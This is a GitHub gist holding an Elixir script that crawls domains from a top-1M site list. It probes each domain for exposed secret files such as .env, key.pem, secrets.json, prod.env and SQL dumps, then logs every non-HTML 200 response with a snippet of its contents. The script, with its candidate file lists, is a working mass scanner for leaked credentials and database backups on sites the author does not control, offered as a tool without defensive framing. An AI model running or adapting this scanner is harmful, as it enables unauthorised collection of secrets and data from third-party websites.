Last active
April 3, 2023 08:57
-
-
Save mpfund/16dbe9f911dc3daa1a6dd56b2b67b7b6 to your computer and use it in GitHub Desktop.
crawler in elixir. finding secret files in alexa top 1m csv
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Script setup: fetch and compile the third-party packages this crawler uses.
#   :req             - HTTP client used to request each candidate URL
#   :csv             - decoder for the ranked-domain CSV input
#   :parallel_stream - ParallelStream.map/3, used to run requests concurrently
Mix.install([
  :req,
  :csv,
  :parallel_stream
])

# Set the Logger level to :info for the rest of the script.
Logger.configure(level: :info)
# Brainstormed candidate file names. Only some of them are in the active
# `files` list below; the rest are kept here as ideas:
#
#   Desktop.ini, /.git/config, /.DS_Store, /.subversion/config
#   Dockerfile, package.json, .env, appsettings.json, secrets.json
#   deploy.sh
#   .travis.yml, config.yml, docker-compose.yml, secrets.yml
#   secret.php, secrets.php, settings.php, config.php
#   config.py, settings.py, main.py, application.py
#   config.js, dev.js, app.js
#   config.json, default.json, appsettings.json, credentials.json
#   db.properties, application.properties, app.properties, main.properties,
#   dev.properties, config.properties
#   log.log, app.log, db.log, staging.log, stage.log, production.log, prod.log
#   user.log
#   strings.xml, config.xml
#   app.module.ts, environment.ts

# File names appended to "https://<domain>/" for every domain in the input.
# Each entry costs one HTTP request per domain, so entries must be unique
# (the original list contained "stage.env" twice).
files = [
  ".env",
  "appsettings.json",
  "secrets.json",
  "db.log",
  "app.log",
  "strings.xml",
  "config.js",
  "dev.js",
  "app.js",
  "secrets.php",
  "httpd.conf",
  ".conf",
  "dump.sql",
  "db.sql",
  "all.sql",
  "backup_file.tar",
  "db.dump",
  "db.tar",
  "db.dump.gz",
  "env.js",
  "dotenv",
  "process.env",
  "config",
  "test.env",
  "prod.env",
  "stage.env",
  "production.env",
  "app_key.pem",
  "key.pem",
  ".env.js",
  ".env.json",
  "Dockerfile",
  "package.json",
  "dev.properties",
  "prod.properties",
  "production.properties"
]
# Crawl pipeline.
#
# Reads "<rank>,<domain>" rows from ~/Downloads/top-1m.csv, builds one URL per
# (domain, candidate file) pair, requests them with 5 parallel workers, keeps
# the responses that came back 200 with a non-HTML body, and reports each hit
# on stdout and in out.txt.

outFile = File.open!("out.txt", [:write, :utf8])

# Requests a single URL. Always returns %{url: url, req: result}, where result
# is the {:ok, response} | {:error, exception} tuple from Req.get/2, or nil
# when the request raised.
fetch = fn url ->
  IO.puts("sending #{url}")

  try do
    # decode_body: false keeps the body as the raw binary. With Req's default
    # decoding, JSON and archive responses are turned into maps/lists, which
    # would crash the String-based checks further down the pipeline.
    %{url: url, req: Req.get(url, retry: false, decode_body: false)}
  rescue
    Jason.DecodeError ->
      %{url: url, req: nil}

    e in RuntimeError ->
      IO.puts("runtime error #{e.message}")
      %{url: url, req: nil}

    ErlangError ->
      IO.puts("erlang error")
      %{url: url, req: nil}

    e ->
      # Any other exception: log it and skip the URL rather than letting one
      # bad request take down the worker.
      IO.puts("error #{Exception.message(e)}")
      %{url: url, req: nil}
  end
end

# True when the body starts (after optional whitespace) with an HTML doctype
# or <html> tag, case-insensitively. The regex is byte-oriented, so it is safe
# on bodies that are not valid UTF-8.
html_body? = fn body ->
  Regex.match?(~r/\A\s*<(?:!doctype|html)/i, body)
end

# Keeps only successful, 200-status responses that declare a content type
# other than text/html and whose body does not look like an HTML page.
interesting? = fn
  %{req: {:ok, resp}} ->
    case Req.Response.get_header(resp, "content-type") do
      [content_type | _] ->
        resp.status == 200 and
          is_binary(resp.body) and
          not String.contains?(String.downcase(content_type), "text/html") and
          not html_body?.(resp.body)

      [] ->
        false
    end

  _ ->
    false
end

# Prints a hit and appends it to out.txt, one hit per line.
report = fn %{url: url, req: {:ok, resp}} ->
  snippet = String.slice(resp.body, 0..20)

  # Binary files can yield a snippet that is not valid UTF-8, which cannot be
  # written to a :utf8 device; fall back to its inspected form.
  preview = if String.valid?(snippet), do: snippet, else: inspect(snippet)

  outStr = "#{url}: #{preview}"
  IO.puts(outStr)
  IO.puts(outFile, outStr)
end

"~/Downloads/top-1m.csv"
|> Path.expand()
|> File.stream!()
|> CSV.decode()
# |> Enum.reverse()
# Skip the first 60000 rows of the CSV.
|> Stream.drop(60000)
# |> Stream.map(&IO.inspect/1)
# Drop rows the CSV decoder rejected, and rows that are not exactly two
# columns, instead of raising on them.
|> Stream.filter(&match?({:ok, [_, _]}, &1))
|> Stream.flat_map(fn {:ok, [num, url]} ->
  IO.puts("num# #{num}, #{url}")
  Enum.map(files, &("https://" <> url <> "/" <> &1))
end)
|> ParallelStream.map(fetch, num_workers: 5)
|> Stream.filter(interesting?)
|> Stream.map(report)
# NOTE(review): Enum.take(1) halts the whole crawl after the first reported
# hit. If the intent is to scan the entire list, replace it with Stream.run().
|> Enum.take(1)

File.close(outFile)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment